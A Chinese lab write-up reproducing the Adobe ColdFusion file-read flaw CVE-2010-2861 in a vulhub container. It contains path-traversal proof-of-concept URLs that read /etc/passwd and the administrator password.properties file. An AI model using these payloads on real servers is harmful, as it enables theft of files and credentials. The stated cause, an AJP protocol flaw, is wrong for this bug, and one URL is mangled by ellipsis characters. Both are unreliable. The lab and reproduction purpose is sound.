09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
漏洞名称:Adobe ColdFusion 文件读取漏洞 (CVE-2010-2861)
简介:
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
影响版本
Adobe ColdFusion 8
Adobe ColdFusion 9
漏洞原理
由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。
漏洞复现
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Adobe ColdFusion 文件读取漏洞 环境
1.进入 vulhub 的 Adobe ColdFusion 路径
cd /usr/local/tools/vulhub/coldfusion/CVE-2010-2861
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep vulhub
访问 your_ip:8500/CFIDE/administrator/enter.cfm 端口,针对靶场环境进行初始化,大概需要1-5分钟。
漏洞利用
POC
index.cfm?locale=../../../../../../../../../../etc/passwd%00en
/etc/passwd
文件的内容会直接显示在浏览器页面上,但是也会存在因为url编码无法读取的情况。
这里我们可以利用 burp 抓包,然后直接访问
http://139.196.87.102:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en
这里有个需要注意的地方,网上很多复现的文章写的是 ‘enter.cfm?locale=’ ,实际复现过程中我用的是 ‘index.cfm?locale’ 复现成功的。
还有个问题,就是我使用的是破解版的 burp ,因为这个原因,我在复制 POC 改数据包的时候
../../../
会变成 &/&/&
,导致我复现失败,同时我的 burp 还不能敲空格键!!! [垃圾复现文章害死人,破解版的 burp 同样害人不浅]
再继续尝试读取管理员密码
/CFIDE/administrator/index.cfm?locale=../../../../../../../lib/password.properties%00en
修复建议
根据官方提示升级至最新版
相关文章
- ctf-web:文件包含漏洞和举例-HCTF2018 WarmUp「建议收藏」
- 文件包含漏洞—allow_url_fopen和allow_url_include详解
- ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞「建议收藏」
- 安全之文件解析漏洞
- 一文了解文件上传漏洞
- ICMS 8.0.0后台任意文件读取0day漏洞分析
- 【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)
- phpMyAdmin 4.8.1 远程文件包含漏洞复现
- Apache ActiveMQ任意文件写入漏洞
- 一个隐藏SQLite数据库长达22年的漏洞
- 新手漏洞挖掘经验分享
- K8S 生态周报| Kubernetes 爆出全版本漏洞
- CVE-2017-9805 S2-052远程代码执行漏洞
- RCE-远程命令执行和代码执行漏洞-知识
- 文件包含漏洞-知识点
- 【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍
- [图]漏洞悬赏计划成立10周年 谷歌推新漏洞悬赏网站
- Word曝0day漏洞:无需启用宏,打开文档就自动安装恶意程序
- PHP文件包含漏洞总结
- 安全研究人员蓄意引入漏洞?该道歉的是这些自媒体们!
- MySQL数据库漏洞扫描技术的应用与发展(mysql漏洞扫描)
- mssql 注入漏洞:利用上传文件实现远程操作(mssql 注入上传文件)
- MySQL漏洞下载文件提权攻击(mysql下载文件提权)
- Oracle8i安全性的疑点早已被发现的漏洞(oracle8i安全漏洞)
- 实例分析ASP上传漏洞入侵实战及扩展